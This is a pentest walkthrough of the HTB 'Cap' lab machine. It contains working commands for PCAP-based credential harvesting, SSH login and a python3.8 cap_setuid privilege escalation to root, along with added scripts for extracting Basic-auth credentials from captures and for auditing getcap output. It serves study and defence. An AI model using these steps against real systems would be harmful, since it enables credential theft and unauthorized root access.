pentest.html – Pentest Notes

Date: 2025-12-02
Box: HTB – Cap (Pentest Study Note)

HTB Cap – Pentest Walkthrough Notes

1. Initial Enumeration

Full TCP scan with default scripts and version detection:

nmap -sC -sV -p- <IP>

Open ports discovered:

  • 22/tcp – SSH
  • 80/tcp – HTTP

2. Web Enumeration

The HTTP service exposes a capture interface that allows downloading PCAP files. By incrementing the numeric part of the URL, different captures can be retrieved:

http://<IP>/data/0
http://<IP>/data/1
http://<IP>/data/2

data/0 contained sensitive authentication data.

3. PCAP Analysis → Credential Extraction

After downloading data/0, inspecting it with Wireshark (or even just strings) revealed an HTTP Basic Authorization header:

Authorization: Basic bmF0aGFuOnNvbWVwYXNzd29yZA==

Decoded with base64:

echo bmF0aGFuOnNvbWVwYXNzd29yZA== | base64 -d
nathan:somepassword

This gives valid SSH credentials for user nathan.
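
The same extraction, automated as an added example (this script is not part of the original notes and is not an HTB artefact): a dependency-free reader for classic libpcap files that walks Ethernet/IPv4/TCP frames and reports every HTTP Basic credential sent in clear, which is also how a defender would triage a capture for leaked logins. The sample capture is constructed inline with made-up addresses, ports and timestamp; only the Basic token is the one from the notes. Function names and the 10.0.0.x addresses are assumptions of this example.

```python
import base64
import struct

# --- constructed sample capture (not a real HTB artefact) -------------------
# Addresses, ports and timestamp are made up; the Basic token is the one shown
# in the notes (nathan:somepassword).

def _ipv4_header(src: str, dst: str, payload_len: int) -> bytes:
    """20-byte IPv4 header, no options; header checksum left 0 (not checked here)."""
    return struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 20 + payload_len, 0, 0, 64, 6, 0,
        bytes(int(o) for o in src.split(".")),
        bytes(int(o) for o in dst.split(".")),
    )

def _tcp_header(sport: int, dport: int) -> bytes:
    """20-byte TCP header (data offset 5), PSH|ACK, checksum 0."""
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)

def build_sample_pcap(http_request: bytes) -> bytes:
    """Wrap one HTTP request in Ethernet/IPv4/TCP inside a classic libpcap file."""
    tcp = _tcp_header(54321, 80) + http_request
    ip = _ipv4_header("10.0.0.5", "10.0.0.10", len(tcp)) + tcp
    frame = b"\x00" * 12 + b"\x08\x00" + ip          # zero MACs, EtherType IPv4
    global_hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    record_hdr = struct.pack("<IIII", 1700000000, 0, len(frame), len(frame))
    return global_hdr + record_hdr + frame

SAMPLE_PCAP = build_sample_pcap(
    b"GET / HTTP/1.1\r\nHost: 10.0.0.10\r\n"
    b"Authorization: Basic bmF0aGFuOnNvbWVwYXNzd29yZA==\r\n\r\n"
)

# --- minimal pcap reader -----------------------------------------------------

def iter_tcp_payloads(pcap: bytes):
    """Yield (src, dst, sport, dport, payload) for every IPv4/TCP frame."""
    (magic,) = struct.unpack("<I", pcap[:4])
    if magic == 0xA1B2C3D4:
        end = "<"                      # little-endian file (the common case)
    elif magic == 0xD4C3B2A1:
        end = ">"                      # big-endian writer
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled)")
    (linktype,) = struct.unpack(end + "I", pcap[20:24])
    if linktype != 1:
        raise ValueError("only Ethernet (LINKTYPE_ETHERNET) frames are handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(end + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 54 or frame[12:14] != b"\x08\x00":
            continue                   # too short, or not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:                 # not TCP
            continue
        src = ".".join(str(b) for b in ip[12:16])
        dst = ".".join(str(b) for b in ip[16:20])
        tcp = ip[ihl:]
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4
        payload = tcp[data_off:]
        if payload:
            yield src, dst, sport, dport, payload

def find_basic_auth(pcap: bytes) -> list:
    """Report every HTTP Basic credential sent in clear inside the capture."""
    findings = []
    for src, dst, sport, dport, payload in iter_tcp_payloads(pcap):
        head, _, _ = payload.partition(b"\r\n\r\n")   # request headers only
        for line in head.split(b"\r\n"):
            name, _, value = line.partition(b":")
            if name.strip().lower() not in (b"authorization", b"proxy-authorization"):
                continue
            scheme, _, token = value.strip().partition(b" ")
            if scheme.lower() != b"basic":
                continue
            try:
                decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
            except ValueError:         # binascii.Error is a ValueError subclass
                continue
            user, _, password = decoded.partition(":")
            findings.append({"src": src, "dst": dst, "dport": dport,
                             "user": user, "password": password})
    return findings

if __name__ == "__main__":
    for f in find_basic_auth(SAMPLE_PCAP):
        print(f"{f['src']} -> {f['dst']}:{f['dport']}  user={f['user']}  password={f['password']}")
```

To run it against a downloaded capture, pass the file bytes (`find_basic_auth(open("0.pcap", "rb").read())`). The reader deliberately stays small: it does not reassemble TCP streams, so a header split across two segments is missed, and pcapng files are rejected rather than misparsed; for anything beyond a quick check, Wireshark's HTTP dissector or the `Credentials` view remains the better tool.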

4. Foothold – SSH User Shell

Use the extracted credentials to obtain a user shell:

ssh nathan@<IP>

Login succeeds and a standard user shell is obtained.

5. Privilege Escalation via Capabilities

Check Linux capabilities on the system:

getcap -r / 2>/dev/null

Relevant output:

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

Key points:

  • cap_setuid lets a process running this binary call setuid() with any UID, including 0, regardless of the UID it started with.
  • It does not mean that simply running python3.8 automatically gives a root shell.
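
As an added example (not part of the original notes), the check a practitioner would want after `getcap -r / 2>/dev/null`: a small audit that parses getcap output in both the older `/path = caps+flags` syntax shown above and the newer libcap `/path caps=flags` syntax, flags capabilities that are root-equivalent when they sit in the permitted set, and ranks script interpreters first, since a capability on an interpreter is directly scriptable. The dangerous-capability list, the interpreter pattern and the two extra sample lines (ping, perl) are assumptions constructed for this example; only the python3.8 line comes from the notes.

```python
import re

# Capability sets whose presence on an ordinary user-executable binary is
# normally enough for a local root; an assumption for this audit, not an
# exhaustive catalogue.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}
# Script interpreters make any capability directly usable from a one-liner.
INTERPRETER_RE = re.compile(r"/(python|perl|ruby|php|node|lua)[0-9.]*$")
# One libcap clause: "cap_a,cap_b+eip" or "cap_a=ep"
CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)([+=])([eip]*)$")

def parse_getcap_line(line: str):
    """Return (path, {cap: flags}) for one getcap line, or None for blanks/noise.

    Accepts both "/path = cap_a,cap_b+eip" (older libcap) and
    "/path cap_a=ep" (libcap 2.41 and newer)."""
    line = line.strip()
    if not line.startswith("/"):
        return None
    if " = " in line:
        path, caps = line.split(" = ", 1)
    else:
        path, _, caps = line.rpartition(" ")
    table = {}
    for clause in caps.split():
        m = CLAUSE_RE.match(clause)
        if not m:
            continue
        names, _, flags = m.groups()
        for name in names.split(","):
            table[name] = flags
    return path, table

def audit_getcap(output: str) -> list:
    """Flag dangerous file capabilities, most urgent first."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, table = parsed
        for cap, flags in table.items():
            if cap not in DANGEROUS_CAPS or "p" not in flags:
                continue            # not in the permitted set: not usable as-is
            findings.append({
                "path": path, "cap": cap, "flags": flags,
                "effective": "e" in flags,
                "interpreter": bool(INTERPRETER_RE.search(path)),
            })
    findings.sort(key=lambda f: (not f["interpreter"], not f["effective"], f["path"]))
    return findings

# Constructed sample: the python3.8 line from the notes plus two invented ones
# (a benign ping entry and a newer-format perl entry) to exercise both syntaxes.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/local/bin/perl cap_setuid=ep
"""

if __name__ == "__main__":
    for f in audit_getcap(SAMPLE_GETCAP):
        tag = "INTERPRETER " if f["interpreter"] else ""
        print(f"{tag}{f['path']}: {f['cap']}+{f['flags']}  (remove with: setcap -r {f['path']})")
```

Feed it the real output with `audit_getcap(open("getcap.txt").read())` or via a pipe. The remediation it prints, `setcap -r <path>`, clears the file capabilities; on Cap the fix is simply that python3.8 should never carry cap_setuid, and cap_net_bind_service, if a service genuinely needs a low port, belongs on a dedicated, non-scriptable binary or is better replaced by a reverse proxy.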

6. Why the First Attempt Was Not Root

The initial attempt was:

/usr/bin/python3.8 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

This only replaces the current process image with /bin/sh, but never calls setuid(0). As a result, the shell still runs with user nathan's UID. Nor does the capability survive the exec: it is a file capability on python3.8, and /bin/sh carries no file capabilities of its own, so (ambient capabilities aside, which nothing here sets) the new shell process cannot call setuid(0) either.

The capability gives “the power to become root” via setuid(0), but that call has to be made explicitly, from inside the Python process that holds the capability, before anything else is executed.

7. Correct PrivEsc Exploit

Working exploit using the capability:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Now:

whoami
root

And finally:

cat /root/root.txt

8. OSCP-Style Key Takeaways

  • Enumeration: Guessable PCAP IDs in the web interface → information disclosure.
  • Credential Harvesting: Basic Auth credentials extracted from captured HTTP traffic.
  • Foothold: SSH access using the recovered nathan credentials.
  • PrivEsc Vector: Misconfigured Linux capabilities on /usr/bin/python3.8.
  • Exploit Detail: cap_setuid ≠ auto-root; you must explicitly call setuid(0) before spawning a shell.